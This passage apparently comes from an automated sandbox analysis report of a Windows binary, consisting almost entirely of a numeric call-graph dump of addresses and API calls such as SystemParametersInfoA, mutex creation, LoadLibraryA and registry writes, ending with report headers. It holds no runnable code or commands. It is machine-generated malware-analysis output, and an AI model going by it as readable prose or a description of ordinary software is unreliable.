83693->81276 83694->81279 83695->81288 83696->81305 83697->81395 83698->81296 83699->81296 83700->81309 83702->81315 83703->81322 83704->81306 83706->81355 83707->81392 83708->81392 83709->81392 83710->81364 83711->81361 83712->81389 83713->81389 83714->81395 83715->81320 83716->81331 83718->81345 83719->81346 83721 110808d4 83720->83721 83722 110808d8 83721->83722 83723 110808ef 83721->83723 83733 11029a70 247 API calls 2 library calls 83722->83733 83725 11080908 83723->83725 83726 110808ec 83723->83726 83729 110b0460 83725->83729 83726->83723 83734 11029a70 247 API calls 2 library calls 83726->83734 83735 11081590 83729->83735 83736 110815dd 83735->83736 83737 110815b1 83735->83737 83740 1108162a wsprintfA 83736->83740 83741 11081605 wsprintfA 83736->83741 83737->83736 83738 110815cb 83737->83738 83739 11162bb7 __expandlocale 5 API calls 83738->83739 83742 110815d9 83739->83742 83747 11029a70 247 API calls 2 library calls 83740->83747 83741->83736 83742->83678 83742->83679 83750 110ea88b 83748->83750 83749 110ea925 83758 110b0660 249 API calls std::locale::_Init 83749->83758 83750->83749 83751 110ea8ae 83750->83751 83752 110ea8c5 83750->83752 83759 11029a70 247 API calls 2 library calls 83751->83759 83754 110ea8c2 83752->83754 83755 110ea8f2 SendMessageTimeoutA 83752->83755 83754->83752 83760 11029a70 247 API calls 2 library calls 83754->83760 83755->83749 83758->83688 83778 11174898 83779 1116c675 __expandlocale 34 API calls 83778->83779 83780 111748b5 _LcidFromHexString 83779->83780 83781 111748c2 GetLocaleInfoA 83780->83781 83782 111748f5 83781->83782 83783 111748e9 83781->83783 83801 1116558e 63 API calls __stricmp_l 83782->83801 83785 11162bb7 __expandlocale 5 API calls 83783->83785 83788 11174a65 83785->83788 83786 11174901 83787 1117490b GetLocaleInfoA 83786->83787 83794 1117493b _CountryEnumProc@4 _strlen 83786->83794 83787->83783 83789 1117492a 83787->83789 83802 1116558e 63 API calls __stricmp_l 83789->83802 83790 111749ae GetLocaleInfoA 83790->83783 83792 111749d1 83790->83792 83804 1116558e 63 API calls __stricmp_l 83792->83804 83794->83783 83794->83790 83795 11174935 83795->83794 83803 11164644 63 API calls __strnicmp_l 83795->83803 83796 111749dc 83796->83783 83799 111749e4 _strlen 83796->83799 83805 1116558e 63 API calls __stricmp_l 83796->83805 83799->83783 83806 1117483d GetLocaleInfoW _GetPrimaryLen _strlen 83799->83806 83801->83786 83802->83795 83803->83794 83804->83796 83805->83799 83806->83783 83807 11109bc0 83808 111101b0 std::locale::_Init 247 API calls 83807->83808 83809 11109c21 83808->83809 83810 11109c39 OpenEventA 83809->83810 83853 11108120 83809->83853 83813 11109d61 GetStockObject GetObjectA InitializeCriticalSection InitializeCriticalSection 83810->83813 83814 11109ca8 CloseHandle GetSystemDirectoryA 83810->83814 83816 111101b0 std::locale::_Init 247 API calls 83813->83816 83815 11109cc8 83814->83815 83815->83815 83817 11109cd0 LoadLibraryA 83815->83817 83818 11109db3 83816->83818 83817->83813 83819 11109d01 83817->83819 83820 11109dcc 83818->83820 83870 110f4ab0 250 API calls std::locale::_Init 83818->83870 83821 11145c70 std::locale::_Init 68 API calls 83819->83821 83823 11110040 409 API calls 83820->83823 83824 11109d0b 83821->83824 83825 11109de8 CloseHandle 83823->83825 83826 11109d12 GetProcAddress 83824->83826 83827 11109d2a GetProcAddress 83824->83827 83828 1109ee00 12 API calls 83825->83828 83826->83827 83829 11109d54 FreeLibrary 83827->83829 83830 11109d46 83827->83830 83831 11109df4 83828->83831 83829->83813 83830->83813 83832 11109e95 83831->83832 83833 111101b0 std::locale::_Init 247 API calls 83831->83833 83834 11109ea2 83832->83834 83835 11109e9d 83832->83835 83836 11109e03 83833->83836 83838 11162bb7 __expandlocale 5 API calls 83834->83838 83873 110fa920 267 API calls 3 library calls 83835->83873 83840 11109e14 83836->83840 83841 11109e1d 83836->83841 83839 11109ebc 83838->83839 83871 110f4ab0 250 API calls std::locale::_Init 83840->83871 83843 11110040 409 API calls 83841->83843 83844 11109e39 CloseHandle 83843->83844 83845 11145c70 std::locale::_Init 68 API calls 83844->83845 83846 11109e4a 83845->83846 83846->83832 83847 111101b0 std::locale::_Init 247 API calls 83846->83847 83848 11109e58 83847->83848 83849 11109e72 83848->83849 83872 110f4ab0 250 API calls std::locale::_Init 83848->83872 83851 11110040 409 API calls 83849->83851 83852 11109e8e CloseHandle 83851->83852 83852->83832 83854 11110280 3 API calls 83853->83854 83855 1110815c 83854->83855 83856 11110280 3 API calls 83855->83856 83857 1110816c 83856->83857 83858 11110280 3 API calls 83857->83858 83859 1110817e 83858->83859 83860 11110280 3 API calls 83859->83860 83861 1110818f 83860->83861 83862 11110280 3 API calls 83861->83862 83863 111081a0 83862->83863 83864 111101b0 std::locale::_Init 247 API calls 83863->83864 83865 111081b1 83864->83865 83866 1110829a std::exception::exception 83865->83866 83867 111081bc LoadLibraryA LoadLibraryA 83865->83867 83874 111634b1 RaiseException 83866->83874 83867->83810 83869 111082be 83870->83820 83871->83841 83872->83849 83873->83834 83874->83869 83875 110262f0 83876 110262fe GetProcAddress 83875->83876 83877 1102630f 83875->83877 83876->83877 83878 11026328 83877->83878 83879 1102631c K32GetProcessImageFileNameA 83877->83879 83881 1102632e GetProcAddress 83878->83881 83882 1102633f 83878->83882 83879->83878 83880 11026361 83879->83880 83881->83882 83883 11026346 83882->83883 83884 11026357 SetLastError 83882->83884 83884->83880 83885 11135c20 83886 11135c58 83885->83886 83887 11135c29 83885->83887 83888 11145ef0 std::locale::_Init 68 API calls 83887->83888 83889 11135c2e 83888->83889 83889->83886 83890 11133b00 256 API calls 83889->83890 83891 11135c37 83890->83891 83891->83886 83892 1105e820 57 API calls 83891->83892 83892->83886 83893 11137300 83894 1113736d 83893->83894 83895 1113730c 83893->83895 83896 1105e820 57 API calls 83895->83896 83898 11137325 83896->83898 83897 1113734d 83897->83894 83913 1112f930 124 API calls std::locale::_Init 83897->83913 83898->83894 83898->83897 83901 1112fc70 83898->83901 83902 1112fc7d 83901->83902 83907 1112fd09 83901->83907 83904 1112fcb8 83902->83904 83914 111165c0 83902->83914 83903 1112fcd2 83903->83907 83910 1105e820 57 API calls 83903->83910 83904->83903 83978 1111c990 83904->83978 83907->83897 83908 1112fca9 83960 11116880 83908->83960 83911 1112fcf4 83910->83911 83911->83907 84093 11116d50 72 API calls std::locale::_Init 83911->84093 83913->83894 83915 111165e4 83914->83915 83916 1111685a 83914->83916 83917 1111677d SystemParametersInfoA 83915->83917 83924 111165ec 83915->83924 83918 11145ef0 std::locale::_Init 68 API calls 83916->83918 83921 111167a8 83917->83921 83920 11116868 83918->83920 83919 111166e0 83922 11162bb7 __expandlocale 5 API calls 83919->83922 83923 11162bb7 __expandlocale 5 API calls 83920->83923 83925 11116833 SystemParametersInfoA 83921->83925 83926 111167bc 83921->83926 83927 111166ef 83922->83927 83928 11116876 83923->83928 83924->83919 83930 11145ef0 std::locale::_Init 68 API calls 83924->83930 83929 11162bb7 __expandlocale 5 API calls 83925->83929 83931 11143bd0 std::locale::_Init RegQueryValueExA 83926->83931 83927->83908 83928->83908 83932 11116854 83929->83932 83933 11116615 83930->83933 83934 111167e4 83931->83934 83932->83908 83935 111166f5 SystemParametersInfoA 83933->83935 83938 11116627 83933->83938 83936 11116814 RegCloseKey 83934->83936 83942 111648ed std::locale::_Init 57 API calls 83934->83942 83939 1111676e SystemParametersInfoA 83935->83939 83940 1111670e 83935->83940 83937 11162bb7 __expandlocale 5 API calls 83936->83937 83943 1111682d 83937->83943 83938->83919 83946 11143bd0 std::locale::_Init RegQueryValueExA 83938->83946 83939->83919 83941 11143bd0 std::locale::_Init RegQueryValueExA 83940->83941 83944 1111673a 83941->83944 83945 111167fe 83942->83945 83943->83908 83947 111166d9 RegCloseKey 83944->83947 83953 111648ed std::locale::_Init 57 API calls 83944->83953 83945->83936 83948 11116805 SystemParametersInfoA 83945->83948 83949 11116650 83946->83949 83947->83919 83948->83936 83950 11116678 83949->83950 83951 11116666 SystemParametersInfoA 83949->83951 83952 11143bd0 std::locale::_Init RegQueryValueExA 83950->83952 83951->83950 83954 111166a4 83952->83954 83955 11116754 83953->83955 83954->83947 83957 111648ed std::locale::_Init 57 API calls 83954->83957 83955->83947 83956 1111675f SystemParametersInfoA 83955->83956 83956->83947 83958 111166be 83957->83958 83958->83947 83959 111166c5 SystemParametersInfoA 83958->83959 83959->83947 83961 11145ef0 std::locale::_Init 68 API calls 83960->83961 83962 1111689e 83961->83962 83963 111168c5 83962->83963 83964 111168a8 83962->83964 83967 11145c70 std::locale::_Init 68 API calls 83962->83967 83963->83964 83965 111168d4 CoInitialize CoCreateInstance 83963->83965 83966 11162bb7 __expandlocale 5 API calls 83964->83966 83968 11116904 LoadLibraryA 83965->83968 83977 111168f9 83965->83977 83969 111168b6 83966->83969 83967->83963 83970 11116920 GetProcAddress 83968->83970 83968->83977 83969->83904 83973 11116930 SHGetSettings 83970->83973 83974 11116944 FreeLibrary 83970->83974 83971 111169e1 CoUninitialize 83972 111169e7 83971->83972 83975 11162bb7 __expandlocale 5 API calls 83972->83975 83973->83974 83974->83977 83976 111169f6 83975->83976 83976->83904 83977->83971 83977->83972 83979 1111c9b0 83978->83979 83980 1111c9c3 83978->83980 83981 1105e820 57 API calls 83979->83981 83982 1111ca03 SystemParametersInfoA 83980->83982 83983 1111c9cf 83980->83983 83984 1111ca0c 83980->83984 83981->83980 83982->83984 83983->83984 83986 11145ef0 std::locale::_Init 68 API calls 83983->83986 83985 1111ca38 83984->83985 83987 1105e820 57 API calls 83984->83987 83988 1111ca44 83985->83988 83989 1111ca6b SystemParametersInfoA 83985->83989 83991 1111ca7d 83985->83991 83990 1111c9dc 83986->83990 83987->83985 83988->83991 83995 1111ca56 SystemParametersInfoA 83988->83995 83989->83991 83992 1111c9e0 GetSystemMetrics 83990->83992 83993 1111c9ec 83990->83993 83996 1111ca9c 83991->83996 83997 1105e820 57 API calls 83991->83997 83992->83984 83992->83993 83993->83984 83994 1111c9f1 SystemParametersInfoA 83993->83994 83994->83984 83995->83991 83998 1111caa8 83996->83998 83999 1111cacc SystemParametersInfoA 83996->83999 84000 1111cadb 83996->84000 83997->83996 83998->84000 84001 1111cab7 SystemParametersInfoA 83998->84001 83999->84000 84002 1111cafa 84000->84002 84003 1105e820 57 API calls 84000->84003 84001->84000 84004 1111cb06 84002->84004 84005 1111cb2a SystemParametersInfoA 84002->84005 84006 1111cb39 84002->84006 84003->84002 84004->84006 84007 1111cb15 SystemParametersInfoA 84004->84007 84005->84006 84008 1111cb58 84006->84008 84009 1105e820 57 API calls 84006->84009 84007->84006 84010 1111cb64 84008->84010 84011 1111cb88 SystemParametersInfoA 84008->84011 84012 1111cb97 84008->84012 84009->84008 84010->84012 84014 1111cb73 SystemParametersInfoA 84010->84014 84011->84012 84013 1111cbb6 84012->84013 84015 1105e820 57 API calls 84012->84015 84016 1111cbc2 84013->84016 84017 1111cbe6 SystemParametersInfoA 84013->84017 84018 1111cbf5 84013->84018 84014->84012 84015->84013 84016->84018 84019 1111cbd1 SystemParametersInfoA 84016->84019 84017->84018 84020 1111cc14 84018->84020 84021 1105e820 57 API calls 84018->84021 84019->84018 84022 1111cc20 84020->84022 84023 1111cc44 SystemParametersInfoA 84020->84023 84024 1111cc53 84020->84024 84021->84020 84022->84024 84025 1111cc2f SystemParametersInfoA 84022->84025 84023->84024 84026 1111cc72 84024->84026 84027 1105e820 57 API calls 84024->84027 84025->84024 84028 1111cca2 SystemParametersInfoA 84026->84028 84029 1111cc7e 84026->84029 84030 1111ccb1 84026->84030 84027->84026 84028->84030 84029->84030 84032 1111cc8d SystemParametersInfoA 84029->84032 84031 1111ccd0 84030->84031 84033 1105e820 57 API calls 84030->84033 84034 1111cd00 SystemParametersInfoA 84031->84034 84035 1111ccdc 84031->84035 84036 1111cd0f 84031->84036 84032->84030 84033->84031 84034->84036 84035->84036 84037 1111cceb SystemParametersInfoA 84035->84037 84038 1111cd2e 84036->84038 84041 1105e820 57 API calls 84036->84041 84037->84036 84039 1111cd65 84038->84039 84040 1111cd3a 84038->84040 84044 1111cd5c 84038->84044 84094 11116e30 84039->84094 84043 11116e30 4 API calls 84040->84043 84040->84044 84041->84038 84043->84044 84045 1105e820 57 API calls 84044->84045 84049 1111cd9a 84044->84049 84045->84049 84046 1111cda6 84048 1111cdd9 84046->84048 84050 1111cdb5 SystemParametersInfoA 84046->84050 84047 1111cdca SystemParametersInfoA 84047->84048 84051 1111cdf8 84048->84051 84052 1105e820 57 API calls 84048->84052 84049->84046 84049->84047 84049->84048 84050->84048 84053 1111ce25 SystemParametersInfoA 84051->84053 84054 1111ce04 84051->84054 84055 1111ce31 84051->84055 84052->84051 84053->84055 84054->84055 84057 1111ce13 SystemParametersInfoA 84054->84057 84056 1111ce50 84055->84056 84058 1105e820 57 API calls 84055->84058 84059 1111ce83 84056->84059 84060 1111ce5c 84056->84060 84062 1111ce7a 84056->84062 84057->84055 84058->84056 84105 11116ee0 84059->84105 84060->84062 84063 11116ee0 4 API calls 84060->84063 84064 1111ceba 84062->84064 84067 1105e820 57 API calls 84062->84067 84063->84062 84065 1111cec6 84064->84065 84066 1111ceed 84064->84066 84069 1111cee4 84064->84069 84065->84069 84070 11116f00 4 API calls 84065->84070 84108 11116f00 84066->84108 84067->84064 84071 1111cf1e 84069->84071 84074 1105e820 57 API calls 84069->84074 84070->84069 84072 1111cf51 84071->84072 84073 1111cf2a 84071->84073 84076 1111cf48 84071->84076 84075 11116f00 4 API calls 84072->84075 84073->84076 84077 11116f00 4 API calls 84073->84077 84074->84071 84075->84076 84078 1111cf82 84076->84078 84079 1105e820 57 API calls 84076->84079 84077->84076 84080 1111cfb5 84078->84080 84081 1111cf8e 84078->84081 84083 1111cfac 84078->84083 84079->84078 84082 11116f00 4 API calls 84080->84082 84081->84083 84084 11116f00 4 API calls 84081->84084 84082->84083 84085 1111cfe6 84083->84085 84086 1105e820 57 API calls 84083->84086 84084->84083 84087 1111cff2 84085->84087 84088 1111d01e 84085->84088 84090 1111d030 84085->84090 84086->84085 84087->84090 84091 11116f00 4 API calls 84087->84091 84089 11116f00 4 API calls 84088->84089 84089->84090 84090->83903 84092 1111d010 84091->84092 84092->83903 84093->83907 84095 11116e54 84094->84095 84096 11116ecb 84095->84096 84097 11116e68 84095->84097 84100 11116e8d 84095->84100 84096->84044 84098 11143bd0 std::locale::_Init RegQueryValueExA 84097->84098 84101 11116e7d RegCloseKey 84098->84101 84099 11116eb2 RegSetValueExA 84103 11116ec4 RegCloseKey 84099->84103 84100->84099 84102 11143bd0 std::locale::_Init RegQueryValueExA 84100->84102 84101->84044 84104 11116eab 84102->84104 84103->84096 84104->84099 84104->84103 84106 11116e30 4 API calls 84105->84106 84107 11116efb 84106->84107 84107->84062 84109 11116e30 4 API calls 84108->84109 84110 11116f1b 84109->84110 84110->84069 84111 1115cca0 84112 1115ccb4 84111->84112 84113 1115ccac 84111->84113 84123 1116406b 84112->84123 84115 1115ccc8 84116 1115ccd4 84115->84116 84117 1115ce00 84115->84117 84126 1115c8e0 CoInitializeSecurity CoCreateInstance 84115->84126 84119 11163aa5 _free 2 API calls 84117->84119 84120 1115ce28 84119->84120 84121 1115ccf1 84121->84117 84122 1115cde4 SetLastError 84121->84122 84122->84121 84143 11170fc4 84123->84143 84125 11164085 84125->84115 84127 1115c955 wsprintfW SysAllocString 84126->84127 84128 1115cad4 84126->84128 84132 1115c99b 84127->84132 84129 11162bb7 __expandlocale 5 API calls 84128->84129 84131 1115cb00 84129->84131 84130 1115cac1 SysFreeString 84130->84128 84131->84121 84132->84130 84133 1115caa9 84132->84133 84134 1115ca2c 84132->84134 84135 1115ca1a wsprintfW 84132->84135 84133->84130 84149 110978f0 84134->84149 84135->84134 84137 1115ca3e 84138 110978f0 248 API calls 84137->84138 84139 1115ca53 84138->84139 84154 110979a0 InterlockedDecrement SysFreeString std::ios_base::_Tidy 84139->84154 84141 1115ca97 84155 110979a0 InterlockedDecrement SysFreeString std::ios_base::_Tidy 84141->84155 84145 11170fd0 84143->84145 84144 11170ffe HeapAlloc 84144->84145 84147 11170fdc 84144->84147 84145->84144 84145->84147 84148 1116e368 DecodePointer 84145->84148 84147->84125 84148->84145 84150 111101b0 std::locale::_Init 247 API calls 84149->84150 84151 11097923 84150->84151 84152 11097936 SysAllocString 84151->84152 84153 11097954 84151->84153 84152->84153 84153->84137 84154->84141 84155->84133 84156 11089cf0 84157 111103d0 ___DllMainCRTStartup 4 API calls 84156->84157 84158 11089d03 84157->84158 84159 11089d0d 84158->84159 84168 11089430 250 API calls std::locale::_Init 84158->84168 84161 11089d34 84159->84161 84169 11089430 250 API calls std::locale::_Init 84159->84169 84164 11089d43 84161->84164 84165 11089cc0 84161->84165 84170 11089950 84165->84170 84168->84159 84169->84161 84211 11088c40 6 API calls ___DllMainCRTStartup 84170->84211 84172 11089989 GetParent 84173 1108999c 84172->84173 84174 110899ad 84172->84174 84175 110899a0 GetParent 84173->84175 84176 11145990 249 API calls 84174->84176 84175->84174 84175->84175 84177 110899b9 84176->84177 84178 11164ead std::locale::_Init 125 API calls 84177->84178 84179 110899c6 std::ios_base::_Tidy 84178->84179 84180 11145990 249 API calls 84179->84180 84181 110899df 84180->84181 84212 11013dd0 22 API calls 2 library calls 84181->84212 84183 110899fa 84183->84183 84184 11143e00 std::locale::_Init 8 API calls 84183->84184 84187 11089a3a std::ios_base::_Tidy 84184->84187 84185 11089a55 84186 11164c77 std::locale::_Init 80 API calls 84185->84186 84189 11089a73 std::locale::_Init 84185->84189 84186->84189 84187->84185 84188 11142e60 std::locale::_Init 247 API calls 84187->84188 84188->84185 84191 1102ad70 std::locale::_Init 127 API calls 84189->84191 84202 11089b24 std::ios_base::_Tidy 84189->84202 84190 11162bb7 __expandlocale 5 API calls 84192 11089c12 84190->84192 84193 11089ac3 84191->84193 84192->84164 84194 11142e60 std::locale::_Init 247 API calls 84193->84194 84195 11089acb 84194->84195 84196 11081e00 std::locale::_Init IsDBCSLeadByte 84195->84196 84197 11089ae2 84196->84197 84198 11081e70 64 API calls 84197->84198 84197->84202 84199 11089afa 84198->84199 84200 11089b3e 84199->84200 84201 11089b01 84199->84201 84204 11081e70 64 API calls 84200->84204 84213 110b7aa0 84201->84213 84202->84190 84206 11089b49 84204->84206 84206->84202 84208 110b7aa0 2 API calls 84206->84208 84207 110b7aa0 2 API calls 84207->84202 84209 11089b56 84208->84209 84209->84202 84210 110b7aa0 2 API calls 84209->84210 84210->84202 84211->84172 84212->84183 84216 110b7a80 84213->84216 84219 111681a3 84216->84219 84222 11168124 84219->84222 84221 11089b07 84221->84202 84221->84207 84223 1116814b 84222->84223 84226 11168131 __dosmaperr __waccess_s 84222->84226 84224 11168154 GetFileAttributesA 84223->84224 84223->84226 84225 11168162 GetLastError 84224->84225 84224->84226 84225->84226 84226->84221 84227 1116a5cd 84228 1116a5dd 84227->84228 84229 1116a5d8 84227->84229 84233 1116a4d7 84228->84233 84245 11177f37 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 84229->84245 84232 1116a5eb 84234 1116a4e3 _doexit 84233->84234 84235 1116a530 84234->84235 84238 1116a580 _doexit 84234->84238 84246 1116a373 84234->84246 84235->84238 84295 11026410 84235->84295 84237 1116a543 84240 11026410 ___DllMainCRTStartup 7 API calls 84237->84240 84244 1116a560 84237->84244 84238->84232 84242 1116a557 84240->84242 84241 1116a373 __CRT_INIT@12 134 API calls 84241->84238 84243 1116a373 __CRT_INIT@12 134 API calls 84242->84243 84243->84244 84244->84238 84244->84241 84245->84228 84247 1116a37f _doexit 84246->84247 84248 1116a387 84247->84248 84249 1116a401 84247->84249 84304 1116e390 HeapCreate 84248->84304 84251 1116a407 84249->84251 84252 1116a462 84249->84252 84257 1116a425 84251->84257 84264 1116a390 _doexit 84251->84264 84389 1116e65b 10 API calls _doexit 84251->84389 84253 1116a467 84252->84253 84254 1116a4c0 84252->84254 84394 1116c4ba TlsGetValue DecodePointer TlsSetValue 84253->84394 84254->84264 84401 1116c7be 16 API calls __freefls@4 84254->84401 84255 1116a38c 84255->84264 84305 1116c82c GetModuleHandleW 84255->84305 84262 1116a439 84257->84262 84390 1117226e HeapFree GetLastError DeleteCriticalSection _free 84257->84390 84259 1116a46c 84395 1116ac7e 84259->84395 84393 1116a44c 6 API calls __mtterm 84262->84393 84264->84235 84266 1116a39c __RTC_Initialize 84269 1116a3a0 84266->84269 84275 1116a3ac GetCommandLineA 84266->84275 84386 1116e3ae HeapDestroy 84269->84386 84270 1116a42f 84391 1116c50b 6 API calls _free 84270->84391 84271 1116a484 DecodePointer 84278 1116a499 84271->84278 84274 1116a434 84392 1116e3ae HeapDestroy 84274->84392 84329 11177e54 GetEnvironmentStringsW 84275->84329 84280 1116a4b4 84278->84280 84281 1116a49d 84278->84281 84282 11163aa5 _free 2 API calls 84280->84282 84284 1116a4a4 GetCurrentThreadId 84281->84284 84282->84264 84284->84264 84286 1116a3ca 84387 1116c50b 6 API calls _free 84286->84387 84290 1116a3ea 84290->84264 84388 1117226e HeapFree GetLastError DeleteCriticalSection _free 84290->84388 84293 1116a3df 84293->84290 84380 1116e46e 84293->84380 84296 111104e0 84295->84296 84297 11110514 ___DllMainCRTStartup 84296->84297 84298 11110501 84296->84298 84299 111104ec 84296->84299 84297->84237 84419 11110430 84298->84419 84299->84297 84301 11110430 ___DllMainCRTStartup 7 API calls 84299->84301 84303 111104f5 84301->84303 84302 11110508 84302->84237 84303->84237 84304->84255 84306 1116c840 84305->84306 84307 1116c849 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 84305->84307 84402 1116c50b 6 API calls _free 84306->84402 84309 1116c893 TlsAlloc 84307->84309 84312 1116c9a2 84309->84312 84313 1116c8e1 TlsSetValue 84309->84313 84310 1116c845 84310->84266 84312->84266 84313->84312 84314 1116c8f2 84313->84314 84403 1116e417 EncodePointer EncodePointer __init_pointers _doexit __initp_misc_winsig 84314->84403 84316 1116c8f7 EncodePointer EncodePointer EncodePointer EncodePointer 84404 11174425 InitializeCriticalSectionAndSpinCount 84316->84404 84318 1116c936 84319 1116c99d 84318->84319 84320 1116c93a DecodePointer 84318->84320 84405 1116c50b 6 API calls _free 84319->84405 84322 1116c94f 84320->84322 84322->84319 84323 1116ac7e __calloc_crt 3 API calls 84322->84323 84324 1116c965 84323->84324 84324->84319 84325 1116c96d DecodePointer 84324->84325 84326 1116c97e 84325->84326 84326->84319 84327 1116c982 84326->84327 84328 1116c98a GetCurrentThreadId 84327->84328 84328->84312 84331 11177e70 84329->84331 84334 1116a3bc 84329->84334 84330 11177e85 WideCharToMultiByte 84332 11177ea5 84330->84332 84333 11177edd FreeEnvironmentStringsW 84330->84333 84331->84330 84331->84331 84406 1116ac39 Sleep 84332->84406 84333->84334 84342 11172029 GetStartupInfoW 84334->84342 84336 11177eab 84336->84333 84337 11177eb3 WideCharToMultiByte 84336->84337 84338 11177ec5 84337->84338 84339 11177ed1 FreeEnvironmentStringsW 84337->84339 84340 11163aa5 _free 2 API calls 84338->84340 84339->84334 84341 11177ecd 84340->84341 84341->84339 84343 1116ac7e __calloc_crt 3 API calls 84342->84343 84344 11172047 84343->84344 84345 111721bc 84344->84345 84347 1116ac7e __calloc_crt 3 API calls 84344->84347 84349 1116a3c6 84344->84349 84351 1117213c 84344->84351 84346 111721f2 GetStdHandle 84345->84346 84348 11172256 SetHandleCount 84345->84348 84350 11172204 GetFileType 84345->84350 84354 1117222a InitializeCriticalSectionAndSpinCount 84345->84354 84346->84345 84347->84344 84348->84349 84349->84286 84355 11177d99 84349->84355 84350->84345 84351->84345 84352 11172173 InitializeCriticalSectionAndSpinCount 84351->84352 84353 11172168 GetFileType 84351->84353 84352->84349 84352->84351 84353->84351 84353->84352 84354->84345 84354->84349 84356 11177db3 GetModuleFileNameA 84355->84356 84357 11177dae 84355->84357 84359 11177dda 84356->84359 84413 11171a45 73 API calls __setmbcp 84357->84413 84407 11177bff 84359->84407 84362 1116a3d6 84362->84290 84368 11177b23 84362->84368 84363 11177e16 84414 1116ac39 Sleep 84363->84414 84365 11177e1c 84365->84362 84366 11177bff _parse_cmdline 54 API calls 84365->84366 84367 11177e36 84366->84367 84367->84362 84369 11177b2c 84368->84369 84371 11177b31 _strlen 84368->84371 84416 11171a45 73 API calls __setmbcp 84369->84416 84372 1116ac7e __calloc_crt 3 API calls 84371->84372 84379 11177b3f 84371->84379 84376 11177b66 _strcpy_s _strlen 84372->84376 84373 11177bb5 84374 11163aa5 _free 2 API calls 84373->84374 84374->84379 84375 1116ac7e __calloc_crt 3 API calls 84375->84376 84376->84373 84376->84375 84377 11177bdb 84376->84377 84376->84379 84378 11163aa5 _free 2 API calls 84377->84378 84378->84379 84379->84293 84381 1116e47c __IsNonwritableInCurrentImage 84380->84381 84417 1116d88b EncodePointer 84381->84417 84383 1116e49a __initterm_e 84385 1116e4bb __IsNonwritableInCurrentImage 84383->84385 84418 11163dd5 14 API calls __cinit 84383->84418 84385->84290 84386->84264 84387->84269 84388->84286 84389->84257 84390->84270 84391->84274 84392->84262 84393->84264 84394->84259 84398 1116ac87 84395->84398 84396 11170fc4 _calloc 2 API calls 84396->84398 84397 1116a478 84397->84264 84397->84271 84398->84396 84398->84397 84399 1116aca5 Sleep 84398->84399 84400 1116acba 84399->84400 84400->84397 84400->84398 84401->84264 84402->84310 84403->84316 84404->84318 84405->84312 84406->84336 84409 11177c1e 84407->84409 84411 11177c8b 84409->84411 84415 11177590 54 API calls x_ismbbtype_l 84409->84415 84410 11177d89 84410->84362 84410->84363 84411->84410 84412 11177590 54 API calls __splitpath_helper 84411->84412 84412->84411 84413->84356 84414->84365 84415->84409 84416->84371 84417->84383 84418->84385 84420 11110474 EnterCriticalSection 84419->84420 84421 1111045f InitializeCriticalSection 84419->84421 84422 11110495 84420->84422 84421->84420 84423 111104c3 LeaveCriticalSection 84422->84423 84424 111103d0 ___DllMainCRTStartup 4 API calls 84422->84424 84423->84302 84424->84422 84425 11030b78 84426 11143630 249 API calls 84425->84426 84427 11030b86 84426->84427 84428 11143780 64 API calls 84427->84428 84429 11030bc3 84428->84429 84430 11030bd8 84429->84430 84432 11081e70 64 API calls 84429->84432 84431 110ed520 8 API calls 84430->84431 84433 11030bff 84431->84433 84432->84430 84434 11030c49 84433->84434 84492 110ed5d0 59 API calls 2 library calls 84433->84492 84438 11143780 64 API calls 84434->84438 84436 11030c14 84493 110ed5d0 59 API calls 2 library calls 84436->84493 84439 11030c60 84438->84439 84441 111101b0 std::locale::_Init 247 API calls 84439->84441 84440 11030c2b 84440->84434 84442 11146fe0 19 API calls 84440->84442 84443 11030c6f 84441->84443 84442->84434 84444 11030c90 84443->84444 84494 11088b30 250 API calls 84443->84494 84474 1108a880 84444->84474 84447 11030ca3 OpenMutexA 84448 11030cc3 CreateMutexA 84447->84448 84449 11030dda CloseHandle 84447->84449 84450 11030ce3 84448->84450 84451 1108a980 5 API calls 84449->84451 84452 111101b0 std::locale::_Init 247 API calls 84450->84452 84453 11030df0 84451->84453 84455 11030cf8 84452->84455 84454 11162bb7 __expandlocale 5 API calls 84453->84454 84457 11031773 84454->84457 84495 110161e0 LoadLibraryA 84455->84495 84458 11030d2d 84459 11145c70 std::locale::_Init 68 API calls 84458->84459 84460 11030d3c 84459->84460 84461 11030d49 84460->84461 84462 11030d5c 84460->84462 84483 111466b0 84461->84483 84463 11030d66 GetProcAddress 84462->84463 84464 11030d50 84462->84464 84463->84464 84466 11030d80 SetLastError 84463->84466 84467 110287a0 47 API calls 84464->84467 84466->84464 84468 11030d8d 84467->84468 84496 11009370 412 API calls std::locale::_Init 84468->84496 84470 11030d9c 84471 11030db0 WaitForSingleObject 84470->84471 84471->84471 84472 11030dc2 CloseHandle 84471->84472 84472->84449 84473 11030dd3 FreeLibrary 84472->84473 84473->84449 84475 111101b0 std::locale::_Init 247 API calls 84474->84475 84476 1108a8b7 84475->84476 84477 1108a8d9 InitializeCriticalSection 84476->84477 84479 111101b0 std::locale::_Init 247 API calls 84476->84479 84480 1108a93a 84477->84480 84481 1108a8d2 std::exception::exception 84479->84481 84480->84447 84481->84477 84497 111634b1 RaiseException 84481->84497 84484 11145c70 std::locale::_Init 68 API calls 84483->84484 84485 111466c2 84484->84485 84486 11146700 84485->84486 84487 111466c9 LoadLibraryA 84485->84487 84486->84464 84488 111466fa 84487->84488 84489 111466db GetProcAddress 84487->84489 84488->84464 84490 111466f3 FreeLibrary 84489->84490 84491 111466eb 84489->84491 84490->84488 84491->84490 84492->84436 84493->84440 84494->84444 84495->84458 84496->84470 84497->84477 84498 1103179f SetUnhandledExceptionFilter 84499 110317af std::locale::_Init std::ios_base::_Tidy 84498->84499 84500 6c62607f HeapCreate

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 1109E5B0 Relevance: 98.5, APIs: 41, Strings: 15, Instructions: 501filethreadmemoryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
